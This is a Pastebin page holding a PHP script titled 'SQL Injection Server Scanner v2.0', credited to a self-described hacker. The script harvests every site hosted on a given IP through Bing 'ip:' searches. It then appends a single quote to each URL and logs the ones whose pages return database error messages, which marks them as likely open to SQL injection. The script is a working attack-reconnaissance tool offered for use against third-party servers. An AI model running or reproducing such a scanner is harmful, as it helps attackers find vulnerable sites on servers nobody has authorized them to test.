Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //ReCoded by Pendekar Hitam - Fiber Linux
- //Thanks to Lagripe-Dz
- //Add some new - error/function/logs/ping timeout/minor info
- //Malaysia Newbi3
- @set_time_limit(0);
- @error_reporting(E_ALL | E_NOTICE);
- if(!$argv[1] or !$argv[2]){
- print_r("
- ================================================================================
- USAGE : php sql.php [IP] [FILENAME]
- Example : php sql.php 127.0.0.1 sql.txt
- Blog : cyb3rsyn.blogspot.com
- ================================================================================
- ");
- die();
- }
- function check_url($url,$source,$filename){ // By Pendekar Hitam ft Macklemore
- if (preg_match("/error in your SQL syntax|mysql_fetch_array()|array_merge()|execute query|filesize()|getimagesize()|pg_exec()|mysql_fetch_object()|mysql_num_rows()|mysql_result()|session_start()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$source)) {
- echo "[+] Found -> $url\n";
- $rr=fopen($filename,"a+");
- fwrite($rr,$url."\n");
- }
- else{ echo "[-] Not Found -> $url\n"; }
- }
- function check_sql_inj($site,$filename2){
- $result = @file_get_contents("$site%27");
- check_url($site,$result,$filename2);
- }
- function mystripos($haystack, $needle){
- return strpos($haystack, stristr( $haystack, $needle ));
- }
- function sec($ent)
- {
- $bb = str_replace("http://", "", $ent);
- $cc = str_replace("www.", "", $bb);
- $dd = substr($cc, 0, mystripos($cc, "/"));
- return $dd;
- }
- $npages = 50000;
- $npage = 1;
- $allLinks = array();
- $ip = $argv[1];
- while($npage <= $npages)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=ip%3A' . $ip . '+id=&first=' . $npage);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/');
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
- $result['EXE'] = curl_exec($ch);
- $result['ERR'] = curl_error($ch);
- curl_close($ch);
- if ( empty( $result['ERR'] ) )
- {
- preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $result['EXE'], $findlink);
- for ($i = 0; $i < count($findlink[1]); $i++)
- array_push($allLinks,$findlink[1][$i]);
- $npage = $npage + 10;
- if (preg_match('(first=' . $npage . '&)siU', $result['EXE'], $linksuiv) == 0)
- break;
- }
- else
- break;
- }
- $allDmns = array();
- foreach ($allLinks as $kk => $vv){
- $allDmns[] = $vv;
- }
- $resultPages = array_unique($allDmns);
- sort($resultPages) ;
- print_r("
- ================================================================================
- SQL Injection Server Scanner v2.0
- Re(c)oded By Pendekar Hitam
- cyb3rsyn.blogspot.com
- ================================================================================
- ");
- for ($x = 0; $x < count($resultPages); $x++){
- $h3h3 = $resultPages[$x];
- check_sql_inj($h3h3,$argv[2]);
- }
- print_r("
- ================================================================================
- INFO / IP : ".$ip." / Domain Scanned : ".count($resultPages)."
- FINISHED
- ================================================================================
- ");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement